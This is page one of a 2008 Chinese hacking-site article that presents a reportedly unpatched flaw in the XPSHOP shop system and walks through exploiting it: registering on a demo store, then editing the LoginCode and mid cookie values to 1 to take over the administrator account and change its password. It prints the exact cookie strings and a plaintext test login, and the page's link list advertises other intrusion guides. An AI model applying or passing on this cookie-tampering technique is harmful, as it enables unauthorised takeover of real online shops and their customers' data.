黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·没有路由密码权限时的鸽08-23·XPSHOP商城系统漏洞利用11-02
·MS08067全自动抓鸡利用工11-02·1K JSP网马11-02
·LOG备份与备份差异的对比11-02·通过Mysql入侵服务器11-02
·手工打造更强大的Window11-02·我的网络电脑,网络免费11-02
·著名的智能化免费DNS解析11-02·HastyFree提供1G免费php11-02
·利用“dbo”获得SQL管理10-31·入侵渗透梁静茹官方网站10-31
·妙用QQ安全链接中心10-31·PHP168整站系统0DAY10-31
·ASPXshell MS08-067插件10-31·SA执行命令方法总结10-31
·神奇XT 让Windows图片查10-31·Vista系统EFS加密功能的10-31
·Windows 2008下应对驱动10-30·用U盘共享Windows vista10-29
·占用0%资源 HOST文件打造10-29·延长硬盘寿命!深入了解10-29
·响应MS08-067 Windows系10-29·一种防注入代码的绕过学10-28
·Ms08-067 Exp 详细测试流10-28·织梦(Dedecms)任意代码执10-28
·社工+提权艰难入侵某通信10-28·艰难入侵源码站并提权10-28
[组图]XPSHOP商城系统漏洞利用
        ★★★★★

XPSHOP商城系统漏洞利用

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-11-2 11:53:42
无意中发现这个漏洞的..官方现在还不知道...我没有在别处公布哦..
这个漏洞不好...要直拉改人家管理员密码!!有点儿缺德!!!...
但为了我们的网络更安全..还是看看吧...

首先先看看这个站吧:http://demo1.xpshop.cn/
先注册一个用户进去..为了方便也为了不要那么垃圾账户在人家系统里.我这说一下我注册好了的用户名:wc1217 密码:77423704

好..还是用啊D打开网站比较好..看截图:记得要保留cookies


之后便看看他的Cookies...


代码:
以下是引用片段:
LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14

我们改一下这两个值:LoginCode=0684;mid=14   .......都改成1      :

代码:
以下是引用片段:
LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1

点击修改..后右键刷新看一下..要注意.不要刷得太快...不然就没用了..

[1] [2] 下一页

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体:
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886